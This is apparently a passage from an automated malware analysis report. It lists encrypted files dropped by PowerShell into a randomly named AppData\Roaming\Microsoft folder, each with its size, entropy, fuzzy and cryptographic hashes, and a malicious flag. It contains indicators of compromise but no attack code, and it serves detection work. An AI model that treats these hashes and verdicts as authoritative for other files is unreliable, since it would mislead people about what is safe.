                                                                                                    Entropy (8bit):7.998778326132547
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:VB/A8E/LjY/Is7MUuxhXVuVOlJgbxU35Aa8tvVEvA2NJmNhDDg://AH/LVVvqb2ya4VETTEh4
                                                                                                    MD5:1BDDF39CCB93A4944013D9E0F064DCE9
                                                                                                    SHA1:32DFAD9887DFDF2E86ACC4E161DD384B4B1EED13
                                                                                                    SHA-256:44FE7CC928483B2A812599C8AFED5DC30F55ADC23CE4FE4B7B85014AEBF7F50F
                                                                                                    SHA-512:221BE327C33034E736581522C6FA4C9728F71FDF452020AB3D9894048C02CC202D85913B98BEB9992B73A942B65B6A48B70DA7896E9C33B619324CB69A287C5F
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZruqUQNTAMoJiEPvgbj.TQjvYIWgdJHxl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):148492
                                                                                                    Entropy (8bit):7.998773719585919
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:8fMPifWgn2Ig0/KehhnNGeLgBukUC26iy9SAhGf87E2:1YZn2IgKOqJmvREf87E2
                                                                                                    MD5:1EDC8AFFECF03D0149AF4EF98449FF5D
                                                                                                    SHA1:F7A14E1989DC64EDD06392D28EA077C59C2971D6
                                                                                                    SHA-256:75AC552D525FBFE22843DE64E0B14204B50E2A579B28C8569B47C8D2EE34FF96
                                                                                                    SHA-512:062DE50A577F446F30883D6CE596AF3505BF6DD02B9A2012B0B59D4C56E86C584D6C59D62661EA93A3FCDCDC6D805F98EA3D9D0A538C2AA37A8F8753B2858377
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZtRIfkCwMOyJL.MCVJNRdxSHsOvY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):169723
                                                                                                    Entropy (8bit):7.998940561346495
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xUlL+0ZfNpqrhIWH6r0ngdN/vffArMprrc2homhCNrwICWr0Nv8/xFLv:xUl607pahIEWkgdZvfhfmm4IWd/xFz
                                                                                                    MD5:6CC6327CB09A27B6D9E1CE18787C87D9
                                                                                                    SHA1:EB3054666BF22AF47258AC89861729EDC8863328
                                                                                                    SHA-256:5097242E5651626CEFEB79387DA1116117C6AB476A10985617800F4354E23D04
                                                                                                    SHA-512:11F0076F683F11C1CF14A58A98288C7881A44D3A0BE9B4615A6235DB913110B0878AA7C1EBAC9D19387F1524A7C331CDBE35E854D4CAC32FC6D0B9549488596F
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aAKldTqByI.HYTkiUoQzp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56621
                                                                                                    Entropy (8bit):7.996747004507503
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:G5y4Gs9vKGe3NQE9ATOBx1uUlr8YhfM6xHJKSWxBwZwfvPz8Q:G5jGoKGe9t+8BG6zmF34Q
                                                                                                    MD5:0F1B56250B83C05512B33694D0D8C07F
                                                                                                    SHA1:4A6F528E97910A740D4C95EF1400D79DBFA699F1
                                                                                                    SHA-256:584459055CBCDE03E8A174674DD9D177D101DF725A983EE4FF43AF2FE170B33F
                                                                                                    SHA-512:0403FC259B05E3CF7B963F8649AE071DB68D68D2379B3B290F6BA1947BFD2C9BA83F64DA4BC4934513AA96AE21956F0DA9423F3815C3A0349F14D0B3FC0BE235
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aUtheHQOTCRdwsVD.hDORUVXsmCy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80971
                                                                                                    Entropy (8bit):7.997476059584378
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:CAumUxhix9QAnO8Ab7TEq+2DBwcSD6n1Yw45bRW/:MmUxkwk4bRBwLen10e/
                                                                                                    MD5:C8DA523443862D2B69E05B73DC85E8B7
                                                                                                    SHA1:61597ADACB6237839EB58F8B248C892E79F93EEB
                                                                                                    SHA-256:DAF75EC4724D87F099F806899563B5B561610827600B7C91DF70D276932EB446
                                                                                                    SHA-512:DFAE075E208E833EAD7A5A5A7FADECE1FAFB735D420E464980600566E1B555E09E3A537461F4593BD65BCD4280A263205A53A32330A474B001A5D3520AB740CF
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aXZEnQmNxzMJRpYObw.RenMfXQBmwdz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):156854
                                                                                                    Entropy (8bit):7.998888113944318
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:WK8z2lwgDvGqcPtQUbq3zKh0zgRcxWD1KIKPSaGp6gZ6a:WKozgDvGNvbYTzgRc0D10NGp0a
                                                                                                    MD5:83EE8CDD6F3101434761E45CB6D273FE
                                                                                                    SHA1:646429A916026ED8FA68E4265117ED0317423EA9
                                                                                                    SHA-256:5632952544DAB9E2CBCEE29AAA7C8743EECE6F94E543775B0C171FD058919B45
                                                                                                    SHA-512:21FA497CB1892C97AA4A6B5FA064E2601BB12A2688D8675478C83F5D1519B005BEC0879A2C1811194CAE6B89347DA68DCD509F531BC0E47700BEFAC2115583D0
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\abKgFMrHtlPdVuRfCD.rKbtqsNWCpDvMlnmgAR
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):162575
                                                                                                    Entropy (8bit):7.998813582513272
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:VKtx75D+kH25I/xePStx6qr4tuVwy8P16rCern7p8hgVrkxi+t2Hb:Vsx7AkH8DeMqr4tuWv6rL3p8mV3Hb
                                                                                                    MD5:BAF4CDD80BFF43810D28E52CF5DF38EF
                                                                                                    SHA1:F6D722604BE71ADE778F0EB768AAE1CCBAA1B990
                                                                                                    SHA-256:13A8D9F0B29C8F6349D5EA6631F730D1AE22D9E476F355282744F54E9B246CF0
                                                                                                    SHA-512:EEF73BDC9CF9DD184DE3B05C3AB15A777DC18370CE19CB53169773AF598595C860DEF1F29D097F7B17C2795C4E0325984323701F2C8D64D69C6F36CEE6BE8365
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\abpfVnJNdDg.tCRiUoQgSVrvlh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):152349
                                                                                                    Entropy (8bit):7.99884013222276
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:EKxVgNIYefB8wFgR0C+PUlf0Urzbn+MYWUOzFbBr+VevyXbb4nqe:EYMIYeg6PSf0UnT+BBCNyVYM5e
                                                                                                    MD5:0396F6176818C09F13469C7A1885CBE4
                                                                                                    SHA1:A471AC3B2C4E4F18624A83D0C2A11822ADFB40D3
                                                                                                    SHA-256:447B1B236CC9561588644B11141A2F0D6F2EB08635ECB5B09323908FDCAC169C
                                                                                                    SHA-512:528F7F1F5081C1FD7E4294B98E120D0533145D825976DEEEB58D7164C5B539DDF30AE763E2139287BBDD4787CC97A2AD4E6D1CF91106036A274EEB5D8AB4DF2C
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\anGipsDqgQuNW.YRCflarIkSXmUFcz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):68686
                                                                                                    Entropy (8bit):7.996766566502999
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:rXv7pC50/YuAx7ZXR0hrmHuBKeIclqBU7ln6DdNK:b7pCC/YFVeKusehx
                                                                                                    MD5:223B15F507487B87C32C614C8C5618DF
                                                                                                    SHA1:AD3CE12066344FB6E4A415ADA1FCD7295DA1E1BC
                                                                                                    SHA-256:8F0AEDF4640D6B9996895A5D2E1B257D620CCB6AC173891E01163038C5141289
                                                                                                    SHA-512:CBDD7667142EC1EC98976362344B5EA28EDD416CD49D18F99FA313DD9D07602AB5CEF9747EBE106018A4B856CA8DC2E2797E43687872C263142DF6061AC6B8B1
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bApIDQShGjqdlWw.naKDegqTjLCPOGiBU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105675
                                                                                                    Entropy (8bit):7.998375875864055
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:RgRSmNJjW9uiE6PTj+hoOu5IoreyZElt19cwxgwURG+6tlRw0Un2kmvjc98:RgRSQJoNEwTSi7moqyZtGUc+eykvjZ
                                                                                                    MD5:CB79751F800973326A22FC57F96BA145
                                                                                                    SHA1:8D32B9B0FFA97E83FA18F99169B2E186C7D593BC
                                                                                                    SHA-256:5BF1FF3BC11BB5C6BFE7487EA5436C5731A1D96F185083B132F964437D0A8504
                                                                                                    SHA-512:39F815C8E05E3453ADF386C6D92A1CA33339DF151070AD659FD71FBA78D3B5D6E10E3AC4CB077C0F9E6B6C8774F5F962D311ABF2ACBA1CBC39061FD667F0168F
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bBhLMZRYrqAjmneT.ASclNopVXWiGux
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95225
                                                                                                    Entropy (8bit):7.997885672228678
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:nCd2uyUln7/n+SOB3HrCiRoCxjapXpi5D3Gx9EweFCRrYxwgCnycm/xpxMk+UMxq:1uFl72SOZWs/jgi527daPaPnwpx0UMxq
                                                                                                    MD5:53A28D35AA167BDA5A8458888F7F1386
                                                                                                    SHA1:299D40200288F460013AAD9DD117C2EFB4A6F127
                                                                                                    SHA-256:A03F051F196A212A2F6C7D2DC99721E27B04722914BD609530D6CCA41CD24A51
                                                                                                    SHA-512:CBDC5C16474300990EA0AE6170F771F3B773F44F5280F104B607F692D22DB8D02EB6A1DE4D0338BE380C904C4959BEB1F1ECD9D18F23FE9CB979B6F8C9CA9931
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bDvTyXjJYBxmzetou.YVNGpZfmxqFJwtu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):153305
                                                                                                    Entropy (8bit):7.998874488326099
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:LN3qPKR3UMsgbbdN7uuxKijj+ADuKtgjRHeYlPr/jkL5nfmijG:x32MrRpuw/fDXg0SD/jG5nfzjG
                                                                                                    MD5:13ED3D0748ED51320C498E6F685940F0
                                                                                                    SHA1:BAE452F2A3ABF93294AA291419A3BA433C433739
                                                                                                    SHA-256:272E7F588FE86A1A4DEEAD321C4AFBAE89897EFAF09F13E27079DCAFBED507A3
                                                                                                    SHA-512:9B242D5FFE69228C85627A5DEDD02AA13D6481202CE4ABA4FB4983A76D3A6ECB85991B7DA44DE3E04286DA9FE8974FB6DD79A12E1035EFF95851DF3F42398B53
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bFKBPNQUnoewfDECr.qnVyTJtYFZHxz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):192215
                                                                                                    Entropy (8bit):7.999062622232931
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:wONmd2nlbUHG87B3kgnLbOU4t0KcDd9l/6b6FyZlXvMgm9bhXXrpmQx:dm4nK7B3km+tjcDd9Fz0ZF0gm9bXx
                                                                                                    MD5:A7DE2DE5904B329EA068127329EF1B49
                                                                                                    SHA1:41E7EAE3499DB4F52ECDB6C8D9731E59415353A6
                                                                                                    SHA-256:ED61C14CBE8880AAD4A81742258B70FE31DD9FD33CE1B96A9FBCD062F6280544
                                                                                                    SHA-512:73849743CE8E14A99AC7F4AC8AC69894A0D5FCF48CED0104010FEAD32AA22B9C9FDB10CD452F1336D2C8477FE8194E54A487177EA0F4B795D58FC1B1222175C8
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bGBjUzNTFSfVDMxwy.UMBTVDaYozW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74593
                                                                                                    Entropy (8bit):7.997678027182254
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:/IV3+3Pq/7sRQYgt6VimRutxak00Bp8hWPMZ1CP4:QVO2sRZW6w1s0L8PH
                                                                                                    MD5:D7E22B719C0FEFE5660A608DD180DBC5
                                                                                                    SHA1:9BA5BD5F07D5F0C4F21EBC2B60776BE55CE83E5B
                                                                                                    SHA-256:F3D1EF71DDE0DA94692AF704D8B6E75B84FB7DD21B68290FBCD2E983C8399303
                                                                                                    SHA-512:0B0A7D468EE57BDDD4A0794CFE93D5EF863739314968DD4BB4F73CEA99E32CA9C15ADFDF06595F828785C92A14C8F85557D21BFDD6C995A080EB2CFD91EB0A96
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\baYIzxdoZBShnFusUW.SxgkZUwfLIGEiFq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):162104
                                                                                                    Entropy (8bit):7.9988258444941085
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:GReXrbQIFjLzQiEHtoDd5+URXShkxvH9hbXULh0qZXCX7Q6BVW4pL7S1u23lM/zL:Ge/QwlnDGUVzdJuSqZX2QujJ7SvW//
                                                                                                    MD5:458C07D799F8E6B5985B04ECCDC37983
                                                                                                    SHA1:6F20BE2E19F3B13E9E6D6F97ABA6C37E9ADF70CD
                                                                                                    SHA-256:74CE5772FA790343FC02CD634BC36FAFFEFD0EBCDCE248CDF392903A124D598B
                                                                                                    SHA-512:90F3C55055E8FCB0427C6E634CB3372DC585C873F4C8A1E6B6F4FE6FDB1EF4AC50B85D4A62E215C81A057E62C5C7882269276B298F92730D6A98333748A470EE
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bfJvuyYTrXUgLHFiI.mgZFSEtpBiPd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):183052
                                                                                                    Entropy (8bit):7.998923257142434
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:UsDnjwxvqs/81927ruqfO+uqKAVTWYx5+41Lz9s2ko7nD8kM6C:tPwxvqs7rTWZbAV604CLxFkeDBs
                                                                                                    MD5:80B6212D3592D9072D2DA81FAF625D5B
                                                                                                    SHA1:EDDC5F54719698F3C64D125F99FF7A2646801D02
                                                                                                    SHA-256:710FB56380DD748C45F2D1454B02303699FF985E22B5FF9DEE0CA551872B692C
                                                                                                    SHA-512:0457D78C87883A41134FF1F2AA494DA44468CB3BF5BC3F8CE1AD2D76842C07FE51E1542A0CB5B03017AD4C8BB93DC0CEA60E7AA55DA57132276091FB3A6D4C94
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cFeZwbNdUY.FVeoIvhgiBw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194762
                                                                                                    Entropy (8bit):7.9989803981171015
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:/iX5FpYRHX5NKQMWDMWQnB+9kbpT7DJD3/IUYIiMuuBHDW4Yn/kM/m821zG:/4zpQzKQNDMB2k9Drx1b5s/kqmjzG
                                                                                                    MD5:2B449C2AF240F3D03FE000DE35732820
                                                                                                    SHA1:69B2B6E2E7333CA99183E65DF06302396CB25B8D
                                                                                                    SHA-256:3123A41341D48CDA4F4FEEBE69D2059B4A2941475F54E819906EFEA3EDC91821
                                                                                                    SHA-512:2E2FA2830920088C9788C2F0FB9276D004B6EA46079389E96D890084131A10FA7ACDC9F6DFABBDD5F3FBAF8DFD4540660B5C8ADB2F04A515FF619E1B045D9C9F
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cZOdDupgxkws.KXtgiImeojxpbWPuFvO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):148067
                                                                                                    Entropy (8bit):7.998693486658707
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:pUQfw1aNU5IaY0FcW4Z2tTyqLQdB47bcKrpXxcv1VVJt96Q+:p3wuNuQabbpXxcv1VVJt96Q+
                                                                                                    MD5:1FEB4C230FA324F499C51453C7490AA8
                                                                                                    SHA1:8251205D434D49531C44EEC0FD7D6524FFFB4035
                                                                                                    SHA-256:C2CEE3FF36955016FCB146D60A7912C3F3C202E04752158BCFB95981EFED43D6
                                                                                                    SHA-512:E310208706C34981DA3664561551ACA6D97B34D5A4AAF9029AE4E0F1E0BE927F2BB375DCD675044DAB5BE5D5AE5DB275EACED63E8EB4A4B4D342F753AADE1B20
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cmfPUbXzeSDQtolu.cOLVfDuiXmTwQvIxhW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126803
                                                                                                    Entropy (8bit):7.998530691210638
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:IWaD7UW12s11QEPE9xStOr/XOFWh9jpD2DeMdKkGuB:U8M2s1Hg0OTOFWh9Z2SyKduB
                                                                                                    MD5:B7D8573B0FBA78207784A03FE1062931
                                                                                                    SHA1:B4F5873CF0374ED14924B2F5513463C2B82C2078
                                                                                                    SHA-256:58FFF49ECE065D56E85D9446A063DBBC648FF61D979B3F36D7A556C0C1899036
                                                                                                    SHA-512:BB6AAFEC6FCA2F905E93A7621D7E5B608866EBE3390B5006C899944DAF7EDC57BFF3E69430E99721758A49360A10BBB486D1F78C78C1CA203C6DCBA8BB467381
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dhkaCMvToniNXOjyUze.OnSfPARMCgBeWvsixK
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74005
                                                                                                    Entropy (8bit):7.997316868257508
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HFcQPizsRy8KtY8D3UdKi593M6Xn378WAZ4KK5Y/4giCk6:HzizzTT3i5ZM67bG/jDL
                                                                                                    MD5:4C394F80F3F517C5B4B1C15A1A00CB26
                                                                                                    SHA1:601072167A7683710403A6BD58EFB5907FBEBF13
                                                                                                    SHA-256:7348189CAB24D6714627B5CAE4B7D084B516A682837C2B5BCEBC47DC790013C2
                                                                                                    SHA-512:F5D8A37E7E34BE0CB60FDC9FD019738A92FB86006E1757D61AA3253542DB73F0D3218EB485E400C703B678612A7EE385E2D288F2BB94EA3C7EBD1AA247EEE647
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dhrmUeoMODzQxCWq.NBVdnbxzqp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102774
                                                                                                    Entropy (8bit):7.998211423073378
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:853406xpk9SjETtEvY7+nGOdNoPP6nQ40i/UEOWm1eArMuyX+ooGEKh/ZSCgPGNF:ygp1/M+FAy0iMiiEoYh/ZSwN/9N/NLL
                                                                                                    MD5:F39D4D72A1C122AF133646BB98664094
                                                                                                    SHA1:83FCEAC751B34C1E5994F6EA3ADF22392552AD9C
                                                                                                    SHA-256:065BE2F331EF08ED02FB13FA099218BD0A36B3386A05DCCD86A28E48F39FDA7D
                                                                                                    SHA-512:8413C28959D864B004861B3B7AE41CC92AB63EE217B116F3793D790406A80B4C1C7C426106B2110605316A336ACF5B0CFAFD08FF259DDC697B2D915B15DB8AB4
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\diZbzOSoXpn.yHmFnNkjUBgPV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):155255
                                                                                                    Entropy (8bit):7.9987671245786665
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:a8l9Y9ctwioHMgvrxy+HI/4FDR8A/bzHvFTgg2SMDWuXWAqH:a8lBtwiwMgI+HIAD8AjzHtTamuQ
                                                                                                    MD5:F3170630F0B9746CDAD6740FFAFD95EC
                                                                                                    SHA1:424D3285AB3D190D13A1E30130AD1BA5D8544FE6
                                                                                                    SHA-256:9F1EADE3747CE2A4E723A32B5625C788DC4078CBD12675C18FDE6BEF5CD75032
                                                                                                    SHA-512:0BC2F95EB186BED136DBB2485331BF9530B372CC5B3299814F2D2840DE77EDADE11BF443B7980083B5D1BB2D0736CC85FE5388F6DAA75AFCF774F2730B0FB665
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\djYBXphMPa.UPBOWgXhIwqTuAxGo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):83487
                                                                                                    Entropy (8bit):7.99771937889109
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:RgRSmNJjW9uiE6PTj+hoOu5IoreyZElt19cwxgwURG+6te:RgRSQJoNEwTSi7moqyZtGUc+5
                                                                                                    MD5:0025B8675E8A46F7D35BA200E381F5F9
                                                                                                    SHA1:B446D834216F82628D9A6A1CF3C860C930EF8F70
                                                                                                    SHA-256:56C21B815A0DFA251E6B69AF64B3C32B8B9082D9019166671AA32CC14C471B09
                                                                                                    SHA-512:4A1D0BA5F728C3E8FEE0EA317B1B663A54E9550A0A59959CA9C1F070D339323DC4BF6E7EED4FE73AF2E7F388AB9E73BF926793FCCCE2BB91DABA40F722F2D79B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dquYUPXIpbHo.eFBYJvTHAI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):136657
                                                                                                    Entropy (8bit):7.998703743314394
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:SN6F/astw79Kk2v7F8SGHnusxSOr6ArNuB8f0SiRL:Sa/astw7UbFZgG5vR
                                                                                                    MD5:CD4175E22454F92B5547B4CF5EE6AF23
                                                                                                    SHA1:DE7D57729AAE89D45E988ADCC4092065840ABC79
                                                                                                    SHA-256:B6DACAB469EE796AA5C5A187E72B5C737E20D12FFDBD224EAFC216A6217D0226
                                                                                                    SHA-512:43294344DAEEAA41D0D90EBD8C78C8D78035C0BC609956F44F491556867959C5078A5CC313AB7225999C21976E0CF0CA6E75996E799D1142AB5BD0553A7F6042
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dyLVtBHlIAYSxpEgz.MHPzriKYueyCQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87687
                                                                                                    Entropy (8bit):7.997769939491714
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:k6FXReG/vwjQvJ4em09PdUtu/0kdL5AM9ei3k8PNUhoh4QdyWCgFcLPglutkmO:k61j/vwjQvJt9FaAL5J3tP4w48nC6RSO
                                                                                                    MD5:1EEC09FB9E274C16E28FA714F71BAE2D
                                                                                                    SHA1:3C8948DDCA902D194EF03DC1EC49605AEA776129
                                                                                                    SHA-256:B2880C414A0902076F09E638EEC68D8F318DFA1DFA812F0C8F033A29E3B0D5B3
                                                                                                    SHA-512:6D9DD1C0B56A6C1F48B0BA679ADCA929F5502B25D2D6A86C68848AB3715A7713FBDBDD53CA5EAAFFEDC9232FD7B0A42BF3AA8D486B3F27C56F76857B326EDC1B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eCrZlGDugJvo.BjAEKmeRvyYPNVW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187598
                                                                                                    Entropy (8bit):7.999130534204915
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:3OJfn1qFzi4oy1RWEOhyaz0WvX3kHWV+IqxFvK0Trc8KXlRKDuRjVgn96k34t2+I:+FYm4Dzr+X3PIIqxo0TrEAK7gAkoon
                                                                                                    MD5:37827706BB42764DD32ADFFEDA0C1DA8
                                                                                                    SHA1:0DC39465A4A2FE83BF52D1450F295654DA9CC9D0
                                                                                                    SHA-256:E580BEA9A0E650CAF6C26B5DA78D0C55588FCEC975CF5183DE1D60266B358498
                                                                                                    SHA-512:6561DA6B3C38C8F4FC28400C30E50201D8CD5CBF924150E4A788FA61CACBF6983D3A36F431F137E371B17679E7AC0EDDDAE1CE9265CC6688EBD2D2923C2717FD
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eFAuURICmGWxTJhZ.rANdkeWhLaMIPsz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117959
                                                                                                    Entropy (8bit):7.998307830809259
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:TnHXdtJhEifBrhIsXLApQniFzwlvZ8XVCeK54MHBknJbzO:TnHXfJhLI2LniFzrAeK54MHBknZO
                                                                                                    MD5:01C17D5EFB6414AF179DB7691AC85083
                                                                                                    SHA1:E22CB4E882420E28CD3CD011BCED6BEBDD68DDD7
                                                                                                    SHA-256:E60C41183D8E43DBB16DF26EDA500C7B4A181D3EE02B2D269DF82D217BB1636E
                                                                                                    SHA-512:B3FC82180A22DF50E8069D12FB591AEFCEF4E37CAFD3FF5B11CC133E4BBA444932E6122A734796FE52C16EA9E8DDD6789D95325291B494BF5EE6981470C123CF
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eVtyxMBYrJQpUwFPkG.hAgncHXBEDxVYMRU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):197862
                                                                                                    Entropy (8bit):7.998945643084014
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:eyBG6jYEsQPuVH+BKMxoPGaGK4OJsDybN6:eYG6rrPAQxyvX/smY
                                                                                                    MD5:9FBA9E34323B076C2FA9B62E4B96AA13
                                                                                                    SHA1:EEBDA9BDB5C70830319DD6CC06505B2C69CDB094
                                                                                                    SHA-256:1968A7D19AC24FAF139076E06208F9F6DC0DC168AF6761687466B3C118D3C0D5
                                                                                                    SHA-512:16C02136A8BDCED28EBAA37CF1DA8173FDF863230D7A9FC30A63AB2704885769B5229D4341214DA7B00B59AA818DBEAF834F144A9A3F6565C8B49D5FBA4E6091
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eWylVtdKbnQsAOrFXBC.QTPEUDeznKIt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):172431
